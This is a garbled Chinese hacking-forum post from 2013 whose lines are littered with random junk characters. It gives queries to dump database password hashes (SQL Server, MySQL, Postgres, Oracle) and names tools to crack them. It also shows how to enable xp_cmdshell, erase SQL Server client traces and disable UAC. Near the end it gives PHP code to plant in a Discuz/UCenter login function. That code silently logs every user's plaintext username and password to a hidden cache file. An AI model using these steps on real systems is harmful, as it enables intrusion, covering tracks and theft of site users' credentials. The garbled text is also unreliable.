各种类型数据库抓HASH破解最高权限密码! E% R/ {: p" U0 w9 S4 }) u
1.sql server20001 B0 }5 f: n m4 D9 r7 l% N
SELECT password from master.dbo.sysxlogins where name='sa'
3 X% H: y0 X- J/ t9 \0 E- U0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341! q7 d' x. B& q7 S W
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A, p( }. b8 z+ \' k1 M* X7 z
# D" X% d0 {8 ~5 S/ K
0×0100- constant header
; n! Z! t' L! t# z' U9 Q34767D5C- salt8 j ~) u* d. ^' x: T
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash M( f' E& y7 h, J9 w
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash4 ^% m, ]+ @, [- a
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash9 z2 |; @; J! p+ F m, a9 c
SQL server 2005:-, j$ E8 U) S. K1 f. P
SELECT password_hash FROM sys.sql_logins where name='sa'' m8 Q: t+ H1 Z7 r7 o
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F; o3 A$ t' |" x! l2 e
0×0100- constant header' i- E! i4 C2 V$ Q, K
993BF231-salt/ A" T0 H7 `2 B4 e
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
! T3 X% ^: t+ s; Y X7 Q6 jcrack case sensitive hash in cain, try brute force and dictionary based attacks./ y, W6 n. _/ r# F) Q* V# ?. o
7 C& [, @ ^' |/ E" w* A# y: G. Q- dupdate:- following bernardo’s comments:-
. z V9 H+ U, [; S% `' v7 g( c/ ause function fn_varbintohexstr() to cast password in a hex string.0 c' n' m% H7 N- E) U9 X5 R
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins9 f- q( ]2 V' J7 \6 H6 P
v2 [" U g9 e% Y1 G' ]/ DMYSQL:-
+ [ J% s! w& U. o
$ h9 M& _6 t" n9 h9 K) ]In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.- `, j8 |; f i8 O
% J$ Y3 Q/ ?4 O5 n4 h' R
*mysql < 4.1) L* [* X% c. R8 J! H/ X% v
1 E- \7 E: i% \, b1 cmysql> SELECT PASSWORD(‘mypass’);
! j" M+ a) o* d. I) R$ P+——————–+5 Q" y0 @/ y9 y' o
| PASSWORD(‘mypass’) |
1 W) d( _7 a& k+——————–+ O+ X! M( P0 z% h' v
| 6f8c114b58f2ce9e |& F+ M, A7 x) [2 _
+——————–+
! ~$ F5 }6 p! L7 \4 ?9 o8 z* j/ e$ x5 q* U) I2 G/ Y
*mysql >=4.1; K1 l9 k! t) a2 z9 a* G6 @6 i
" c" p! I5 ^* w+ e3 ~( i& r9 x$ Z
mysql> SELECT PASSWORD(‘mypass’);' P6 z+ y% f2 V9 h9 x' S
+——————————————-+- c) C1 |; z8 X- I
| PASSWORD(‘mypass’) |7 k) i1 Q; S8 ]. F* g
+——————————————-+
4 R8 L% v. L7 j4 ^| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |+ R0 A4 b2 o# _9 h" o
+——————————————-+; P8 E, f2 B& u2 A) \
2 }( E" {. B+ t0 f" w6 c9 `
Select user, password from mysql.user' |' ~# o0 J- E) F# N
The hashes can be cracked in ‘cain and abel’
/ A6 E$ p; F/ ^
^9 t' J* K2 z p) G& WPostgres:-
9 Z9 H* @3 D0 }4 ~Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
1 P9 ]6 e2 m6 Q3 I5 Rselect usename, passwd from pg_shadow;
% Y: S. M0 f' C9 _usename | passwd
+ o1 b1 T3 H- h- U/ {7 w! @6 v——————+————————————-6 \& ] H* P& ^
testuser | md5fabb6d7172aadfda4753bf0507ed43963 J; I& m, g8 D$ G
use mdcrack to crack these hashes:-' e3 o! J8 G/ o8 h% o' K$ \
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
* d% G) P! I: d6 g
" K) Z; J, f! L# K: _Oracle:-
: P2 @: x$ x/ tselect name, password, spare4 from sys.user$
4 \1 I/ d* z! G7 ]' R- f- A% bhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g! s7 {; }% `& p8 q% g+ S
More on Oracle later, i am a bit bored….- T" v# b3 F) T
# r k: U; T* ~6 G
]1 \2 A# ?: f$ V4 |, o/ C1 }在sql server2005/2008中开启xp_cmdshell# W' P3 s. k' i& E) y5 Z+ L6 o
-- To allow advanced options to be changed. i+ _8 K* B. `9 P9 p
EXEC sp_configure 'show advanced options', 1
X2 ^2 }. F% h, n" b/ [& AGO
2 a* Y% `: B) V, J' `-- To update the currently configured value for advanced options.
0 ~4 \) D* p2 c0 g! s0 gRECONFIGURE
( w8 i4 \5 h8 U5 M2 \8 ?GO# c% ?9 w2 ?7 n: r
-- To enable the feature.
/ u9 E2 m$ w% c& C6 `7 S- M7 R, Z% hEXEC sp_configure 'xp_cmdshell', 1
3 _* O3 ]: r/ v( W% VGO
; D* h* ]) a6 M4 E( `- ?! f-- To update the currently configured value for this feature." Y2 E0 R4 M/ e- y% D' N$ Z
RECONFIGURE
) q6 s7 D4 F, o9 _GO" ]. C$ M y2 a! d6 f6 p) @
SQL 2008 server日志清除,在清楚前一定要备份。+ @2 k I7 ~+ U
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:, l) E& T! x u9 @5 g
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
$ ]1 z* f6 X: M' j/ h
" w* L* d& d8 u对于SQL Server 2008以前的版本:
3 `; i6 h/ ~+ O6 tSQL Server 2005:
2 K' s1 X$ W" s删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
2 r* |$ e' E- o% [" s* \8 KSQL Server 2000:) N. ^# N0 s9 j
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。) `0 v6 @6 p9 u* H, M0 H8 d) Y+ [0 I
3 A9 L2 g; |$ x: s本帖最后由 simeon 于 2013-1-3 09:51 编辑" n% k( O! x6 @) [+ k* K: b$ {
' s _) z5 T$ n: d" _9 O5 ]
$ K; Z L3 C& z6 I: q
windows 2008 文件权限修改
+ w% X, s8 A3 d+ l$ X) q1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
: [' ]. Z2 s3 B" z( U! P2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
- p3 u1 @! l% ` c6 ~" b" d一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,1 B6 h# M( b1 l8 t7 l
K7 ~5 r8 G& F
Windows Registry Editor Version 5.00
; v- }' o6 f% N. R1 O5 W* }[HKEY_CLASSES_ROOT\*\shell\runas]; R0 ~' y1 B+ e/ `5 @8 L: x
@="管理员取得所有权") m4 w# ?3 k0 v& t) ]
"NoWorkingDirectory"=""
K5 J" @! G* D[HKEY_CLASSES_ROOT\*\shell\runas\command]( p9 L9 d8 k% {2 G: K# o& E
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 u2 H' {( s1 |+ ?$ m" `( `
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 T( W) A; v6 C! o0 i7 f/ e% ]2 ?4 W
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
2 u/ a$ W# {0 [; @- H; e@="管理员取得所有权"% v2 B+ t3 R/ o' Q' }3 y
"NoWorkingDirectory"=""
( r! ^8 R/ w$ ~# L[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]5 [2 h( f! }1 z
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 l6 _- d4 U+ P, `+ w' c* `7 J"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"$ g. H8 O+ S+ ^+ z1 {
% A7 q6 f( U; ^# E- t4 u2 F7 _& Y[HKEY_CLASSES_ROOT\Directory\shell\runas]
T5 _6 e& n$ K4 v@="管理员取得所有权"
. m: P7 U- _8 P% f$ h. T! T"NoWorkingDirectory"=""- ?, @9 ~. ~2 m1 _4 l @9 M
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]" ?% I1 B7 H/ I; D+ H
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
3 |' G9 H+ M! \% x: e/ l"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 ~5 c" ^% @! V) h" p' e3 R' }4 Q L3 c% ^( p1 Z
* n% T7 w5 \# E/ L8 ewin7右键“管理员取得所有权”.reg导入
2 {7 i( f( \" p# ?) z二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,$ A- Q z, L& n8 Q
1、C:\Windows这个路径的“notepad.exe”不需要替换
& W' H A( Q! u$ G8 w2、C:\Windows\System32这个路径的“notepad.exe”不需要替换5 ]% U2 S3 V, e6 V* E, }) U8 o
3、四个“notepad.exe.mui”不要管
f5 g3 z8 m, v3 S7 }& {0 L: v4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和1 p+ o$ [& R+ {! G$ a
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
% g" a; ^8 p2 H2 v替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,: S- c' @2 F9 A; S+ X( t4 y$ [7 ]
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。6 d: A# K0 o9 a) z# A
windows 2008中关闭安全策略:
5 }* f/ y! a4 o/ c3 ereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f# r7 `3 ~0 q3 f* `
修改uc_client目录下的client.php 在! Q$ w! A% b) E
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
% n; l! [; w. b9 j. R下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
3 K6 V0 H7 H+ `1 c' o/ r( D0 Q你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
6 o0 U( Y9 a7 M3 |if(getenv('HTTP_CLIENT_IP')) {
0 @" Y4 n8 V0 I- @. v$onlineip = getenv('HTTP_CLIENT_IP');% e B' k& @4 I! Q2 @
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
3 K! D0 S6 J$ x# j" z$onlineip = getenv('HTTP_X_FORWARDED_FOR');
7 u3 k( r* M' L( V/ O# y, l} elseif(getenv('REMOTE_ADDR')) {$ J' H! d' h: H* W+ {6 b
$onlineip = getenv('REMOTE_ADDR');# t; K4 m% w7 K X
} else {
) _* ^ U6 Z- m7 S$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];, d- v8 Y' M y+ a
}
. X5 `. @1 ^4 _! E5 _, s $showtime=date("Y-m-d H:i:s");
! ^. v2 V2 _/ p' p0 ~5 a $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
4 i' r2 \; ?5 r0 p! q/ a) w $handle=fopen('./data/cache/csslog.php','a+');$ L! e8 Q8 R3 P/ Q v4 z" R
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对